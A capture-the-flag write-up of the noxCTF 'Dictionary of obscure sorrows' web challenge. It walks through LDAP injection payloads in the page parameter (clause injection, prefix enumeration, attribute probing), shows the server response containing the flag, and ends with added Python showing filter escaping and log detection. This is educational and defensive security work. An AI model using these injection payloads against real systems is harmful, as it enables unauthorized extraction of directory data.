Tags: web ldap
Rating: 5.0
# ▼▼▼ Dictionary of obscure sorrows (Web: 902 points, 11/531 = 2.1%) ▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
There are a lot of obscure sorrows in our world.
Your job is not to find those that are plain in sight;
You need to seek further, look deeper.
Find the word that can not be written.
The most obscure sorrow of them all.
http://54.152.220.222/
```
---
## 【Identify the vulnerability】
```
GET /word.php?page=*)(ObjectClass=*   ⇒ Normal response!!
GET /word.php?page=*)(ObjectClass=1   ⇒ Query returned empty
```
↓
**LDAP injection!!** (the `page` value is placed into the LDAP search filter without escaping, so `*)(ObjectClass=*` closes the original clause and appends a new one; a true clause gives the normal page and a false one gives an empty result)
---
## 【Search for flag】
```
Prefix test: page=<char>*   ⇒ prefix tried
GET /word.php?page=%4b*)(objectClass=* HTTP/1.1   ⇒ K*
GET /word.php?page=%6b*)(objectClass=* HTTP/1.1   ⇒ k*
GET /word.php?page=%4f*)(objectClass=* HTTP/1.1   ⇒ O*
GET /word.php?page=%6f*)(objectClass=* HTTP/1.1   ⇒ o*
GET /word.php?page=%56*)(objectClass=* HTTP/1.1   ⇒ V*
GET /word.php?page=%76*)(objectClass=* HTTP/1.1   ⇒ v*
GET /word.php?page=%57*)(objectClass=* HTTP/1.1   ⇒ W*
GET /word.php?page=%77*)(objectClass=* HTTP/1.1   ⇒ w*
GET /word.php?page=%41*)(objectClass=* HTTP/1.1   ⇒ A*
GET /word.php?page=%61*)(objectClass=* HTTP/1.1   ⇒ a*
GET /word.php?page=%4c*)(objectClass=* HTTP/1.1   ⇒ L*
GET /word.php?page=%6c*)(objectClass=* HTTP/1.1   ⇒ l*
GET /word.php?page=%53*)(objectClass=* HTTP/1.1   ⇒ S*
GET /word.php?page=%73*)(objectClass=* HTTP/1.1   ⇒ s*
GET /word.php?page=%59*)(objectClass=* HTTP/1.1   ⇒ Y*
GET /word.php?page=%79*)(objectClass=* HTTP/1.1   ⇒ y*
```
↓
Compare the prefixes that gave a normal response with the words linked in the HTML
↓
```
/word.php?page=Koinophobia
/word.php?page=Klexos
/word.php?page=Kuebiko
/word.php?page=Onism
/word.php?page=Opia
/word.php?page=Vellichor
/word.php?page=Wytai
/word.php?page=Anemoia
/word.php?page=Ambedo
/word.php?page=Lalalalia
/word.php?page=Lachesism
/word.php?page=Lutalica
/word.php?page=Sonder
/word.php?page=Socha
/word.php?page=YuYi
```
↓
```
/word.php?page=WORDS
```
Found a hidden entry, WORDS!! But it was not the flag...
---
## 【Search for other attribute values】
`GET /word.php` or `GET /config.php` (※ config.php was found by guessing)
↓
`Missing RDN inside ObjectClass(document)`
↓
So the entries' ObjectClass is `document`
---
## 【Investigate attributes of ObjectClass】
Attribute list of the `document` ObjectClass (from the Fujitsu directory manual):
↓
`http://software.fujitsu.com/jp/manual/manualfiles/M050000/B1WN4901/02/irepac/irep0289.htm#document`
↓
```
cn (commonName)
description
seeAlso
l (localityName)
o (organizationName)
ou (organizationalUnitName)
documentTitle
documentVersion
documentAuthor
documentLocation
documentPublisher
```
---
```
GET /word.php?page=*)(cn=* ⇒ Query returned empty
GET /word.php?page=*)(description=* ⇒ Normal response★
GET /word.php?page=*)(seeAlso=* ⇒ Query returned empty
GET /word.php?page=*)(l=* ⇒ Query returned empty
GET /word.php?page=*)(o=* ⇒ Query returned empty
GET /word.php?page=*)(ou=* ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=* ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=* ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=* ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★
```
---
## 【Exploit】
The flag format is known to be `noxctf{●●●●●}`, so search `description` (one of the two attributes that returned a normal response) for that substring:
`GET /word.php?page=*)(description=*noxctf*`
↓
```
HTTP/1.1 302 Found
Date: Sat, 08 Sep 2018 23:41:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://54.152.220.222/
Content-Length: 3872
Content-Type: text/html; charset=UTF-8
<html><head>
<title>Lightweight Dictionary Of Obscure Sorrows</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/assets/css/main.css">
</head>
<body class="subpage">
<header id="header">
<h1>Dictionary of <span>Obscure Sorrows</span></h1>
Menu
</header>
<div id="main">
<section class="wrapper style1">
<div class="inner">
<header class="align-center">
<h2>ƢƢƢƢ</h2>
So many sorrows.
noxCTF{K1NG_0F_LD4P}
<section class="wrapper ">
<div class="inner">
<header class="align-center">
<h2>Even more obsure sorrows</h2>
You can click on any of the links below to reach some more interesting words.
</div>
<footer id="footer">
<div class="inner">
<div class="flex flex-3">
<div class="col">
<h3>Words</h3>
<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/jquery.scrolly.min.js"></script>
<script src="/assets/js/skel.min.js"></script>
<script src="/assets/js/util.js"></script>
<script src="/assets/js/main.js"></script>
<nav id="menu">
```
↓
`noxCTF{K1NG_0F_LD4P}`
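As an added example (not part of the original writeup, and not the challenge's PHP), the following shows how a filter built by raw concatenation turns the `*)(description=*noxctf*` payload from the exploit step into a second clause, how RFC 4515 escaping of the `page` value neutralises it, and a small check that flags such requests in an access log. The lookup attribute `word` and the filter shape are assumptions; the real filter is not on the page.

```python
# Added example: vulnerable vs. hardened LDAP filter construction, plus a
# log check. The attribute name "word" is hypothetical (not from the page).
from urllib.parse import urlsplit, parse_qs

LOOKUP_ATTR = "word"  # hypothetical attribute the page searches on


def escape_filter_value(value: str) -> str:
    """Escape an assertion value as RFC 4515 section 3 requires (\\XX hex)."""
    out = []
    for ch in value:
        if ch in "*()\\\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def vulnerable_filter(page: str) -> str:
    """Raw concatenation: metacharacters in page become filter syntax."""
    return f"({LOOKUP_ATTR}={page})"


def hardened_filter(page: str) -> str:
    """Same filter, but the user value can only ever be a literal string."""
    return f"({LOOKUP_ATTR}={escape_filter_value(page)})"


def suspicious_page_param(request_line: str) -> bool:
    """Flag an access-log request line whose page= value carries LDAP
    filter metacharacters after URL decoding (e.g. %4b*)(objectClass=*)."""
    path = request_line.split()[1]
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    page = params.get("page", [""])[0]
    return any(c in page for c in "*()\\")


if __name__ == "__main__":
    # Constructed sample request lines in the shape seen in the writeup.
    for line in ("GET /word.php?page=Koinophobia HTTP/1.1",
                 "GET /word.php?page=%4b*)(objectClass=* HTTP/1.1",
                 "GET /word.php?page=*)(description=*noxctf* HTTP/1.1"):
        print(suspicious_page_param(line), line)
    print(vulnerable_filter("*)(description=*noxctf*"))
    print(hardened_filter("*)(description=*noxctf*"))
```

With escaping applied, the injected text is searched for literally, so neither the attribute enumeration nor the prefix-by-prefix matching above has any effect.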